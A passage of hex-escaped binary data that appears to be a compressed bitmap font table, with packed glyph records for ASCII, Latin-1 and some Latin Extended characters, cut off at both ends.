f0\xe0\x03\x43\xff\x70\x00\x49\x09\x43\x4a\xf0\x84\xff\xa0\x00\x4a\x0d\xc8\x3e\x0e\xad\xfd\xff\x8f\x26\x4c\x6a\x00\x4b\x27\x4e\x4a\x10\x86\xb9\x89\x31\x99\xa9\x99\xa1\x45\x52\x33\x62\x23\x63\x13\x73\x86\x77\x13\x64\x23\x54\x33\x44\x43\x34\x43\x34\x53\x24\x63\x14\x73\x04\x4c\x0d\x4b\x4a\xb0\x85\xc1\xfd\xff\xf0\xe0\x41\x00\x4d\x31\x51\x4a\xd0\x06\xca\x83\xc8\x03\xc1\x03\xb9\x83\xb9\x8b\xa9\x83\x88\x29\x89\x8a\x29\x89\x92\x19\x91\x92\x19\x91\x12\x12\x91\x9a\x09\x99\x9a\x09\x99\x1a\x9b\x22\xa2\x22\xa2\x22\xa2\xe2\x01\x4e\x22\x4e\x4a\x70\x86\x49\x43\xc3\xbb\x83\x30\x8a\x31\x0a\x2a\x12\x22\x9a\x21\xa2\x19\x22\x12\x2a\x0a\xb2\x09\xb2\x83\xb8\x43\x97\x03\x4f\x1f\x51\x46\x70\xae\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\x50\x16\x4b\x4a\xd0\x85\x03\x91\x83\x89\xa1\x2b\x1f\xdd\x50\x1c\x88\x1c\x0d\xee\x43\x00\x51\x2e\xd3\x46\x6e\xae\xd3\x03\x3a\x2a\x76\x53\x93\x43\x93\x33\xb3\x23\xb3\x23\xb3\x23\xb3\x23\xb3\x23\xb3\x33\x93\x34\x93\x43\x74\x54\xec\x0e\x48\xef\x61\xe8\x21\xce\xe9\x41\x24\x00\x52\x27\x4d\x4a\x10\x86\x83\xa8\x83\x99\x21\x92\xa9\x91\xa9\x91\xa9\x91\xa9\x91\xa1\x99\x45\x67\x07\x51\x23\x44\x33\x43\x6b\x86\x48\xa6\x28\xc6\x26\xc6\x08\x53\x19\x4b\x46\xb0\x1d\x9b\x03\x91\x21\x89\xc1\x85\x75\x75\x76\x85\x0c\x17\x56\x4d\x1c\xc8\xdc\x00\x54\x0d\x4f\x42\x10\x86\x1f\x88\x0d\xef\xff\x67\x00\x55\x11\x4d\x4a\x30\x86\xc1\xfe\x3f\x34\x9b\x20\x9a\x39\x90\xba\x01\x56\x26\x50\x42\x10\x86\xd9\x52\x91\x49\x91\x49\x11\x3a\xa1\x39\xa1\xb1\xa9\x29\xb1\x29\x31\x1a\xc1\x19\xc1\x19\x41\x0a\xd1\x09\x51\x5b\x62\xe2\x39\x00\x57\x3c\x55\x42\xb0\x86\xb1\xb9\xb2\x31\x33\x2a\x91\xa1\x2a\x91\xa1\x2a\x91\xa1\x22\x99\x21\x89\x19\xa1\x19\x89\x19\xa1\x11\x91\x19\xa1\x11\x91\x11\xa9\x11\x11\x0a\xb1\x09\x99\x09\xb1\xa2\x09\xb1\xa2\xba\xa2\x42\x2a\x42\xaa\xc9\xb1\x29\x00\x58\x24\x4f\x42\x10\x06\xc2\x09\xb2\x99\x31\x21\x22\x31\x92\xb9\x11\x41\xd3\xda\x61\xd2\xca\x43\x11\x32\xa1\xa9\x21\x22\x31\x12\xc1\x89\x41\x02\x59\x1a\x4f\x42\x10\x86\xc9\x89\x41\x11\x32\xa1\x31\x21\x22\xb1\x99\x31\x12\xc1\xcb\x52\xe2\xfd\x19\x00\x5a\x19\x4d\x46\xf0\x8d\x83\x8a\x83\x4a\xca\x95\x84\x94\x93\x84\x94\x93\x84\x2c\x27\x29\x0f\x1e\x14\x5b\x0d\xc5\x4a\x0e\x85\x83\x1a\xfd\xff\x9b\x83\x01\x5c\x1a\xcc\x42\x8e\x05\x59\x51\xd1\x51\xd1\x51\xb5\xa2\xb2\xa2\xb2\xa2\xb2\xa2\xa2\xa3\xa2\xa3\x6a\x05\x5d\x0d\xc5\x46\x0e\x85\x83\x19\xfd\xff\x9b\x83\x02\x5e\x1d\xee\xc5\x11\xbe\x60\xb5\xa4\x94\x86\x22\x72\x23\x63\x42\x52\x43\x43\x62\x42\x62\x32\x82\x22\x82\x12\xa2\x02\x5f\x08\x4a\x44\xaf\x85\x07\x06\x60\x09\x85\x54\xf7\x85\x19\x21\x05\x61\x1b\xac\x45\xd0\x1d\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x03\x62\x19\x4c\x4a\x10\x86\xc9\x3d\xa1\x99\xb8\xa8\x99\x98\x3a\xf3\xab\x09\x1a\x8a\x83\x11\x91\x1a\x00\x63\x15\xab\x45\xb0\xa5\x93\x03\x09\xaa\x88\xb9\xc1\x5d\x0e\x52\x85\x1c\x08\x59\x00\x64\x19\x4c\x46\x10\xce\xbd\x21\x19\x39\x98\xa0\xa1\x98\x32\xf3\xd9\xd5\xc4\x4c\xc5\xc5\x0c\xc9\x00\x65\x15\xab\x45\xd0\x9d\xaa\x9b\x25\x52\x56\x07\x1f\x4e\x0e\x52\x85\x1c\x08\x59\x00\x66\x14\x8a\x42\x30\xad\x9a\x9b\x99\x90\xb9\xad\x0e\x42\x0e\x82\xe6\xf6\x5f\x01\x67\x1e\x4c\xc6\x0d\x1e\x92\x91\x83\x09\x1a\x8a\x29\x33\x3f\x9b\x98\xa9\xb8\x98\x21\x99\x9c\x14\x09\x1b\x39\x10\xba\x01\x68\x11\x4b\x4a\x10\x86\xc1\x3d\x21\x99\xb0\xa8\x39\xb2\xf2\x5f\x0d\x69\x0b\x43\x4a\xf0\x84\x03\xb1\x83\x1f\x10\x6a\x11\xe8\xbe\x0d\xad\xed\xc1\xa6\xf6\xff\x8a\x66\xe2\xa2\x06\x00\x6b\x1f\x4c\x4a\xf0\x85\xc9\xbd\x9a\x18\x1a\x99\x59\x32\x34\x22\x35\x21\x76\x35\x41\x34\x51\x33\x42\x33\x43\x32\x44\x31\x45\x6c\x09\x43\x4a\xf0\x84\xff\xa0\x00\x6d\x23\xb3\x49\xf0\x86\x91\x1a\x92\x09\x13\x8b\x9a\x92\x83\x20\x22\xab\x29\xab\x29\xab\x29\xab\x29\xab\x29\xab\x29\xab\x29\xab\x29\xab\x05\x6e\x10\xab\x49\x10\x86\x11\x92\x09\x8b\x9a\x23\x2b\xff\xd5\x00\x6f\x17\xad\x45\xf0\xa5\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x02\x70\x1a\x4c\xca\x0d\x86\x11\x9a\x89\x8b\x9a\x89\xa9\x33\xbf\x9a\xa0\xa1\x38\x18\x19\xa1\x99\xdc\x25\x00\x71\x19\x4c\xc6\x0d\x1e\x92\x91\x83\x09\x1a\x8a\x29\x33\x9f\x5d\x4d\xcc\x54\x5c\xcc\x90\x4c\xee\x01\x72\x0f\xa8\x49\x50\x85\x11\x8b\x03\x19\xa2\xa9\xfd\x15\x00\x73\x15\xa9\x49\xb0\x15\x93\x8b\xa1\x88\x31\xaa\x9b\x23\xb3\x31\xa2\x83\x12\x13\x00\x74\x10\x08\x46\x30\x95\xa9\x35\x07\x07\x22\x53\xfb\xb3\x22\x02\x75\x0f\xab\x49\x10\x86\x29\xff\xa3\x9b\x0a\x8b\x11\x92\x01\x76\x1b\xad\x41\xb0\x85\x39\x3b\x91\x31\x91\x29\x19\x22\xa1\x99\xa1\x19\xb1\x11\xb1\x09\x39\x43\x4a\x56\x00\x77\x31\xb3\x41\x70\x06\xb1\x31\x09\xa9\x29\x11\xa9\x29\x11\x21\x09\x21\x11\x21\x09\x19\x21\x19\x09\x19\x21\x11\x91\x11\x21\x11\x19\x09\x31\x09\x19\x09\x31\x22\x09\x31\xaa\x39\xaa\x41\xb1\x21\x00\x78\x1c\xad\x45\xf0\x85\xb9\x89\xa9\x99\x55\x23\x72\x12\x83\x94\x93\x75\x13\x72\x32\x52\x42\x33\x53\x13\x73\x03\x79\x21\x4d\xc2\xad\x85\x41\x33\x91\x31\x91\xa9\x11\x22\xa1\x21\x21\x12\xb1\x11\xb1\x09\x39\xc3\x42\xd2\x51\x59\xd1\x51\xd1\x39\x00\x7a\x10\xab\x49\xd0\x85\x0f\x02\x35\x9c\xdb\x50\xe1\xc1\x83\x00\x7b\x11\xc6\x42\x0e\x25\x99\x11\x21\xfd\x64\x66\x4a\x48\xbf\x1a\x12\x7c\x08\xc2\x4a\xee\x84\x7f\x20\x7d\x12\xc6\x4a\x0e\x05\xa1\x29\x21\xfd\x6a\x66\x44\x48\x3f\x99\x11\x02\x7e\x14\xce\x44\x12\x96\x39\x09\x2b\x09\x91\x21\xa2\x11\x09\x29\x0b\xb9\x11\x00\xa0\x06\x00\xc0\x10\x05\xa1\x0a\x42\xce\x0d\x05\xa3\x83\x07\x05\xa2\x27\x4a\x4e\x10\x2e\x41\x39\x93\x83\x88\x09\x91\x88\x09\x99\x11\x99\x11\x99\x11\x99\x11\x99\x11\x99\x11\xa1\x09\xa1\x09\x91\x90\x83\x18\x33\x41\x19\x00\xa3\x17\x4b\x4e\x10\xb6\xa2\x23\xa1\x98\xc1\x5d\x1d\x88\x1c\x48\x0d\x6e\xa8\xee\xe0\x41\x00\xa4\x26\x0f\xc2\x10\x8e\xd8\x88\xc9\x89\x89\x8a\x99\x03\xaa\x99\xa9\x45\x72\x42\x72\x42\x72\x42\x72\x42\x53\x6b\xa6\x0e\x68\x26\x2a\x56\x4e\xc4\x46\x00\xa5\x21\x4f\x46\x10\x06\xc2\x89\x41\x11\x32\x21\xa2\xa9\x99\x31\x12\xc1\xcb\x52\xc2\x83\xa9\x83\xc9\xc1\x83\xa9\x83\xc9\xe1\xcd\x00\xa6\x0b\xc2\x4a\xee\x84\x07\x84\x07\x07\x04\xa7\x25\xeb\xce\x0d\x9e\x93\x03\x11\xb1\x08\x49\xc9\xc1\xba\xa3\x83\x10\x99\x0a\x29\x3b\x2b\x89\x1a\x89\x03\x21\x43\xca\x49\x49\xb2\x03\x93\x1b\x00\xa8\x09\x47\x50\xf8\x05\x19\x1a\x01\xa9\x2e\x53\x46\xb0\x36\xdb\x03\x3a\x2a\xaa\xc9\x99\x19\xa2\x11\x19\x23\x09\x21\x99\xa0\x1a\x51\x1a\x51\x1a\x51\x1a\x51\x22\x99\xa0\x09\x19\x23\x91\x99\x9a\x95\x53\xec\x0e\x48\xed\x00\xaa\x15\x49\x45\x74\x0d\x9b\x93\x98\x39\x19\x93\x8b\x19\x09\x21\x89\x03\x09\x8a\x01\xab\x1a\x6b\xc5\xb0\x25\x99\xa0\x91\x6d\x44\x66\xd4\x8c\x0c\xc9\x48\x89\x0c\x8d\x0c\x8d\x0c\xc9\x44\x00\xac\x09\xce\x44\x12\x86\x1f\xeb\x00\xad\x08\x45\xc8\x13\x85\x83\x01\xae\x16\x6b\xc9\x13\x9e\xaa\x9b\x15\x07\x16\x2a\x98\x50\x90\x5c\x54\xcc\xcc\x5c\xd5\x00\xaf\x07\x47\x50\xf8\x85\x07\xb0\x0c\x84\x44\xf7\x0c\x89\x10\x91\x08\x09\x00\xb1\x10\xee\x45\x10\x36\x61\x9d\x1d\x7c\x26\xac\x3d\xa2\x83\x0f\xb2\x10\x67\x81\x33\x8d\x8a\x83\x98\x29\xa1\x99\x8d\x84\x0e\x0e\xb3\x13\x67\x81\x33\x8d\x8a\x83\x20\x29\x09\x1a\x3a\xa9\x99\x83\x83\x10\x00\xb4\x09\x85\x58\xf7\x95\x11\x6d\x00\xb5\x11\x2b\x4a\x0e\x86\x29\xff\xa3\x9b\x83\x8a\x03\x11\xc3\x0d\x01\xb6\x32\xca\x4e\x0e\x96\x83\x88\x83\x03\x89\x03\x89\x03\x89\x03\x09\x09\x0b\x09\x0b\x19\x0a\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x01\xb7\x08\x63\x58\x13\x86\x03\x01\xb8\x0b\xa4\xd8\xed\x0d\x91\x20\x91\x0a\x00\xb9\x0a\x64\x81\x33\x85\x83\x10\xfd\x03\xba\x12\x49\x45\x74\x95\x9a\x13\x91\x09\xa1\x8e\x26\x44\x46\x6e\x4a\x00\xbb\x19\x6b\xc5\xb0\x8d\x18\xa1\x91\xa1\x91\xa1\x11\x29\x19\xa1\x91\x19\x35\x23\x32\x23\xdb\x28\x02\xbc\x33\x52\x56\x90\x06\xca\x11\xc2\x29\x41\x31\x39\x65\x73\x52\x83\x52\x92\x42\x42\x33\x32\x33\x34\x22\x43\x34\x22\x42\x12\x62\x42\x13\x52\x33\x23\x42\x43\x07\x31\x52\x07\x21\xb2\x22\xb3\x12\xc3\x12\x00\xbd\x2e\x51\x56\x90\x06\xca\x09\xc2\x21\x41\x29\x39\x31\xb1\x31\xa9\x39\x29\x41\x21\x89\x1a\x99\x83\x11\x91\x89\x98\x11\x75\x52\x72\x43\x63\x43\x63\x53\x62\x53\x72\x52\x63\x07\x73\x07\xbe\x35\x52\x56\x90\x8e\xba\x91\xab\x99\x20\x29\x49\x21\x31\xaa\x31\xa2\x59\x11\x61\x09\xa1\x89\x18\x1b\x8a\x03\x21\x8a\x0a\x21\x09\x31\xa1\x09\xa9\x99\x11\xa1\xa1\x83\x18\xa9\x83\x10\x59\x91\x59\x89\x61\x09\x00\xbf\x16\x4a\xc2\x6d\xa5\xb9\xf5\xc0\x73\xcb\xd6\xc9\x8d\xcd\xad\xa3\x8a\x38\x90\xb1\x00\xc0\x2c\xf1\x42\x30\xae\x79\x00\x79\x08\x79\x08\x79\x14\xe3\xc4\x8d\x25\x46\x45\x46\x45\x08\x67\x06\x85\x06\xa5\xc6\xc4\xc6\x0e\x8a\x0e\x8c\x04\x87\x24\x47\x44\x47\x44\x8d\x07\xc1\x27\xf1\x42\x30\xce\x71\xed\x91\x8c\x13\x37\x96\x18\x15\x19\x15\x21\x9c\x19\x14\x1a\x94\x1a\x13\x1b\x3b\x28\x3a\x30\x12\x1c\x92\x1c\x11\x1d\x11\x35\x1e\xc2\x2b\xf1\x42\x30\x3e\x6a\x62\x11\x51\x21\x79\xe8\x71\xe2\xc6\x12\xa3\x22\xa3\x22\x84\x33\x83\x42\x83\x52\x63\x62\x63\x07\x45\x07\x46\x82\x43\x92\x23\xa2\x23\xa2\xc6\x03\xc3\x2b\xd1\x42\x30\xb6\x99\xc8\x83\x48\x91\x79\xf0\x71\xe2\xc6\x12\xa3\x22\xa3\x22\x84\x33\x83\x42\x83\x52\x63\x62\x63\x07\x45\x07\x46\x82\x43\x92\x23\xa2\x23\xa2\xc6\x03\xc4\x29\xb1\x42\x30\x2e\x19\x51\x19\x79\xf0\x71\xe2\xc6\x12\xa3\x22\xa3\x22\x84\x33\x83\x42\x83\x52\x63\x62\x63\x07\x45\x07\x46\x82\x43\x92\x23\xa2\x23\xa2\xc6\x03\xc5\x2b\xf1\x42\x30\x46\xf1\x90\xe8\x90\x70\x79\x14\xe3\xc4\x8d\x25\x46\x45\x46\x45\x08\x67\x06\x85\x06\xa5\xc6\xc4\xc6\x0e\x8a\x0e\x8c\x04\x87\x24\x47\x44\x47\x44\x8d\x07\xc6\x2f\x56\x42\xf0\xd6\x03\xda\x03\xd2\x7a\x08\x7b\x08\x89\x79\x80\x89\x79\x00\x91\x71\x99\xe9\x99\x03\x39\xa1\x03\xb1\xa1\xe1\x83\xd9\x03\x5a\xb1\x51\xb9\xc9\xb9\x49\xc1\x83\xc3\x03\x02\xc7\x22\xef\xc6\x2d\xb6\x83\xa8\x03\x92\x32\x91\xd9\xe1\xd9\xe1\x3d\x26\x1e\xa6\x0c\xa9\x9a\x39\xa8\x3a\x88\x0c\x8f\x07\x90\x96\x1d\x03\xc8\x1a\xeb\x4a\xd0\x95\x49\x51\xf5\x00\x07\x13\x07\x13\x83\x7b\x78\x20\x72\x20\x32\xb8\x87\x07\x0f\x02\xc9\x19\xeb\x4a\xd0\xad\x41\xed\x41\x0e\x26\x0e\x26\x06\xf7\xf0\x40\xe4\x40\x64\x70\x0f\x0f\x1e\x04\xca\x1b\xeb\x4a\xd0\x1d\x3a\x32\x11\x21\xd5\x07\x13\x07\x13\x83\x7b\x78\x20\x72\x20\x32\xb8\x87\x07\x0f\x02\xcb\x1a\xab\x4a\xd0\x0d\x19\x21\x19\xf1\x83\x89\x83\x89\xc1\x3d\x3c\x10\x39\x10\x19\xdc\xc3\x83\x07\x01\xcc\x0d\xe5\x52\xf0\x84\x19\x21\x75\x23\xfb\xff\x07\xcd\x0d\xe5\x4a\xf0\x94\x11\x0d\x47\xf6\xff\x4f\x00\xce\x11\xe8\x52\xf0\x14\x22\x1a\x11\x09\x21\xd1\xa9\xfd\xff\x1b\x00\xcf\x0e\xa7\x52\xf0\x04\x19\x1a\xc9\xa1\xfd\xff\x13\x00\xd0\x2b\x52\x42\x70\x9e\x83\xc1\x83\xb2\x31\xaa\x39\xa2\xc1\xa1\x41\x9a\xc9\x99\xc9\x03\xab\x03\xab\x99\xc9\x99\xc9\x99\x49\xa1\xc1\xa1\xb9\xa9\x31\xaa\x03\xba\x03\x31\x00\xd1\x29\xce\x4a\x70\xa6\x99\xb0\x83\x30\x91\x79\x98\x49\x43\xc3\xbb\x83\x30\x8a\x31\x0a\x2a\x12\x22\x9a\x21\xa2\x19\x22\x12\x2a\x0a\xb2\x09\xb2\x83\xb8\x43\x97\x03\xd2\x27\xf1\x46\x70\xae\x79\x00\x79\x08\x79\x08\x79\xf0\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\xd3\x23\xf1\x46\x70\xce\x71\xed\x11\x1c\x1e\x50\xb1\xa1\x23\x99\x1c\x99\x9c\x98\xf5\xdb\x89\xc9\x91\xc9\x11\x3a\x1a\x2a\xaa\x03\xc2\x2b\x00\xd4\x26\xf1\x46\x70\x3e\x6a\x62\x11\x51\x21\x79\xd8\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\xd5\x26\xd1\x46\x70\xb6\x99\xc8\x83\x48\x91\x79\xe0\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\xd6\x24\xb1\x46\x70\x2e\x19\x51\x19\x79\xe0\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\xd7\x22\xee\x45\x10\x8e\xd0\x88\xc1\x89\xb1\x99\xa1\xa9\x91\x39\x11\x49\x5a\x59\x4a\x11\xb9\x91\xa9\xa1\x99\xb1\x89\xc1\x89\xd0\x08\x00\xd8\x2c\x51\x46\x70\xae\x93\x99\x03\x1b\x2a\x1a\x3a\x92\xb9\x92\x31\x8b\xb1\x11\xab\x19\x2b\x21\x23\x29\x9b\x29\x93\xb1\x09\xb3\x91\xba\x11\x3a\x1a\x2a\x9a\x03\x9b\x91\x2b\x00\xd9\x15\xed\x4a\x30\x9e\x59\x61\xf5\x30\x83\xfd\x7f\x68\x36\x41\x34\x73\x20\x75\x03\xda\x15\xed\x4a\x30\xbe\x51\xed\x81\x06\xfb\xff\xd0\x6c\x82\x68\xe6\x40\xea\x06\x00\xdb\x18\xed\x4a\x30\x2e\x4a\x42\x11\x31\x21\x79\x80\xc1\xfe\x3f\x34\x9b\x20\x9a\x39\x90\xba\x01\xdc\x15\xad\x4a\x30\x1e\x65\x32\xf2\x10\x83\xfd\x7f\x68\x36\x41\x34\x73\x20\x75\x03\xdd\x1d\xef\x42\x10\xc6\x61\xed\xe1\x26\x27\x06\x45\xc8\x84\xc6\x84\x88\xc4\x66\xc6\x48\x04\x2f\x4b\x89\xf7\x67\x00\xde\x19\x4b\x4a\xd0\x85\xc1\x85\x07\x22\x07\x13\x43\x57\x7e\x34\x31\x43\x71\x20\x72\x34\xb8\x10\x00\xdf\x24\x8c\x4a\xf0\x95\xb2\x23\x0a\x9a\xbd\x11\x9a\x11\x1a\x91\x1a\x91\x1a\x19\x1a\xa1\x99\x21\x99\xa9\x98\x3a\xb3\x6b\x12\x63\x62\x31\x52\x02\xe0\x1f\x4c\x46\xd0\x9d\x51\x59\xf5\x40\x46\x07\x32\x51\x93\xab\x6e\x0e\x44\x68\x46\x86\x46\x86\x46\x66\x68\x2c\x48\x68\x06\xe1\x1e\x4c\x46\xd0\xb5\x49\xed\xc1\x8c\x0e\x64\xa2\x26\x57\xdd\x1c\x88\xd0\x8c\x0c\x8d\x0c\x8d\xcc\xd0\x58\x90\xd0\x0c\xe2\x22\x4c\x46\xd0\x25\x42\x3a\x11\x29\x21\x79\x10\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x03\xe3\x22\x2c\x46\xd0\x9d\x99\xa0\x83\x20\x91\x79\x18\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x03\xe4\x20\x0c\x46\xd0\x15\x19\x29\x19\x79\x18\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x03\xe5\x22\x4c\x46\xd0\x2d\xc9\x90\xc0\x90\x48\x79\x28\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x03\xe6\x26\xb2\x45\xb0\x9e\x1a\xa2\x83\x03\x91\x28\x9a\xc1\xa9\xb9\xa9\x99\x83\x83\x88\x83\x37\x83\x43\x83\x43\x74\x33\x12\x53\x11\x36\x07\x21\x54\x16\x00\xe7\x1a\x4b\xc6\xad\xa5\x93\x03\x09\xaa\x88\xb9\xc1\x5d\x0e\x52\x85\x1c\x08\x99\x85\xc6\x4a\xca\x0d\x01\xe8\x19\x4b\x46\xd0\x9d\x49\x51\xf5\x20\x55\x37\x4b\xa4\xac\x0e\x3e\x9c\x1c\xa4\x0a\x39\x10\xb2\x00\xe9\x18\x4b\x46\xd0\xb5\x41\xed\x81\xaa\x6e\x96\x48\x59\x1d\x7c\x38\x39\x48\x15\x72\x20\x64\x01\xea\x1b\x4b\x46\xd0\x25\x3a\x32\x11\x21\xf5\x00\x55\x37\x4b\xa4\xac\x0e\x3e\x9c\x1c\xa4\x0a\x39\x10\xb2\x00\xeb\x1a\x0b\x46\xd0\x15\x19\x21\x19\x79\x88\xaa\x9b\x25\x52\x56\x07\x1f\x4e\x0e\x52\x85\x1c\x08\x59\x00\xec\x0c\x45\x52\xf0\x84\x19\x21\x75\x23\xfb\x3f\xed\x0c\x45\x4a\xf0\x94\x11\x0d\x47\xf6\x7f\x02\xee\x10\x48\x52\xf0\x14\x22\x1a\x11\x09\x21\xd1\xa9\xfd\xdf\x00\xef\x0d\x07\x52\xf0\x04\x19\x1a\xc9\xa1\xfd\x9f\x00\xf0\x1f\x4c\x4a\xf0\x85\xab\x18\xb2\x3a\x11\xb1\x20\xb1\xa3\x03\x11\x9a\x09\xa2\x33\x9f\x4d\x0c\x8d\xd0\xcc\x1c\x44\xd9\x00\xf1\x16\x2b\x4a\x10\x96\x99\x98\x83\x18\x91\xf1\x11\x92\x09\x8b\x9a\x23\x2b\xff\xd5\x00\xf2\x1b\x4d\x46\xf0\x9d\x59\x61\xf5\x70\x65\x07\x32\x4c\xa6\x26\xe6\x7c\x37\x31\x35\x42\x43\x73\x20\x56\x04\xf3\x1b\x4d\x46\xf0\xbd\x51\xed\x01\xcb\x0e\x64\x98\x4c\x4d\xcc\xf9\x6e\x62\x6a\x84\x86\xe6\x40\xac\x08\x00\xf4\x1e\x4d\x46\xf0\x2d\x4a\x42\x11\x31\x21\x79\xa0\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x02\xf5\x1e\x2d\x46\xf0\xa5\x99\xa8\x83\x28\x91\x79\xa8\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x02\xf6\x1b\x0d\x46\xf0\x1d\x65\x32\xf2\x50\x65\x07\x32\x4c\xa6\x26\xe6\x7c\x37\x31\x35\x42\x43\x73\x20\x56\x04\xf7\x11\xaf\x41\x10\xb6\xe1\xf5\x98\x1d\x7c\x20\x8f\x6c\x78\x19\x00\xf8\x22\xad\x45\xf0\xa5\x8a\x91\x83\x11\x1a\x92\x21\x8a\x21\x09\x9b\x09\x93\x11\x8b\x19\x0b\xa1\x09\xa2\x11\x1a\x92\x83\x91\x89\x22\x00\xf9\x13\x4b\x4a\x10\x96\x49\x51\xf5\x00\x53\xfe\x47\x37\x15\x16\x23\x24\x03\xfa\x12\x4b\x4a\x10\xb6\x41\xed\x21\xa6\xfc\x8f\x6e\x2a\x2c\x46\x48\x06\xfb\x14\x4b\x4a\x10\x26\x3a\x32\x11\x21\xc5\x53\xfe\x47\x37\x15\x16\x23\x24\x03\xfc\x13\x0b\x4a\x10\x16\x19\x21\x19\xe9\x29\xff\xa3\x9b\x0a\x8b\x11\x92\x01\xfd\x24\xed\xc2\xad\xbd\x51\xed\x81\x06\xcd\x44\xc6\x44\xa6\x46\x88\x84\x86\x84\x48\xc4\x46\xc4\x26\xe4\x0c\x0b\x49\x47\x65\x45\x47\x45\xe7\x00\xfe\x1b\xcc\xca\x0d\x86\xc9\x9d\xd0\x4c\x5c\xd4\x4c\x4c\x9d\xf9\xd5\x04\x0d\xc5\xc1\xc8\x44\xcd\xe4\x2e\x01\xff\x25\xad\xc2\xad\x1d\x65\x32\xf2\x10\x83\x66\x22\x63\x22\x53\x23\x44\x42\x43\x42\x24\x62\x23\x62\x13\x72\x86\x85\xa4\xa3\xb2\xa2\xa3\xa2\x73\x00\x00\x00\x00\x08\x01\x64\x0b\x5b\xff\xff\x01\x00\x28\xb1\x42\x30\xae\xd3\x7b\xf0\x71\xe2\xc6\x12\xa3\x22\xa3\x22\x84\x33\x83\x42\x83\x52\x63\x62\x63\x07\x45\x07\x46\x82\x43\x92\x23\xa2\x23\xa2\xc6\x03\x01\x01\x1f\x0c\x46\xd0\x9d\xab\x7b\x10\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x03\x01\x02\x2c\xf1\x42\x30\x2e\x21\x49\x21\x51\x63\x7a\x04\xe3\xc4\x8d\x25\x46\x45\x46\x45\x08\x67\x06\x85\x06\xa5\xc6\xc4\xc6\x0e\x8a\x0e\x8c\x04\x87\x24\x47\x44\x47\x44\x8d\x07\x01\x03\x21\x4c\x46\xd0\x15\x21\xad\xec\xe8\x81\x8c\x0e\x64\xa2\x26\x57\xdd\x1c\x88\xd0\x8c\x0c\x8d\x0c\x8d\xcc\xd0\x58\x90\xd0\x0c\x01\x04\x2c\xd1\x42\x2e\xbe\x71\xe2\xc6\x12\xa3\x22\xa3\x22\x84\x33\x83\x42\x83\x52\x63\x62\x63\x07\x45\x07\x46\x82\x43\x92\x23\xa2\x23\xa2\xc6\x93\xe2\xf2\x00\xf2\x10\x53\x00\x01\x05\x21\x2c\x46\xce\x1d\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x53\x92\xa2\xb2\x43\x00\x01\x06\x21\xef\x46\x30\xc6\x61\xed\xa1\x0f\xa2\x0e\x48\xca\x44\x66\x87\x67\x87\xf7\x98\x78\x98\x32\xa4\x6a\xe6\xa0\xea\x20\x04\x00\x01\x07\x19\x4b\x46\xb0\xb5\x41\xed\xa1\x4e\x0e\x24\xa8\x22\xe6\x06\x77\x39\x48\x15\x72\x20\x64\x01\x01\x08\x24\xef\x46\x30\x36\x5a\x52\x11\x41\x21\x79\xc8\x83\xa8\x03\x92\x32\x91\xd9\xe1\xd9\xe1\x3d\x26\x1e\xa6\x0c\xa9\x9a\x39\xa8\x3a\x08\x01\x01\x09\x1c\x4b\x46\xb0\x25\x3a\x32\x11\x21\xf5\x10\x27\x07\x12\x54\x11\x73\x83\xbb\x1c\xa4\x0a\x39\x10\xb2\x00\x01\x0a\x20\xcf\x46\x30\x3e\x69\xf5\xc0\x07\x51\x07\x24\x65\x22\xb3\xc3\xb3\xc3\x7b\x4c\x3c\x4c\x19\x52\x35\x73\x50\x75\x10\x02\x01\x0b\x19\x2b\x46\xb0\x2d\x49\xf5\x40\x27\x07\x12\x54\x11\x73\x83\xbb\x1c\xa4\x0a\x39\x10\xb2\x00\x01\x0c\x23\xef\x46\x30\x26\x85\x22\xa2\xb4\xf4\xb0\x07\x51\x07\x24\x65\x22\xb3\xc3\xb3\xc3\x7b\x4c\x3c\x4c\x19\x52\x35\x73\x50\x75\x10\x02\x01\x0d\x1c\x4b\x46\xb0\x15\x21\x25\x62\x74\xf4\x30\x27\x07\x12\x54\x11\x73\x83\xbb\x1c\xa4\x0a\x39\x10\xb2\x00\x01\x0e\x27\xef\x4a\x70\x1e\x21\x41\x11\x51\x5a\x7a\xb0\x83\xa9\x83\x9a\x31\x92\x39\x8a\xc1\x89\xc1\x4b\x7f\x29\x31\x38\x31\x37\x32\x46\x72\x40\x74\x20\x06\x01\x0f\x25\x52\x46\xb0\xce\x99\xc9\x99\xc9\x99\xc9\x21\xc9\x21\x19\x92\x19\x99\x83\x39\x1a\xba\xa9\xb1\xfd\x67\x54\x73\x33\x75\x17\x93\x24\x63\x00\x01\x10\x2c\x52\x42\x70\x9e\x83\xc1\x83\xb2\x31\xaa\x39\xa2\xc1\xa1\x41\x9a\xc9\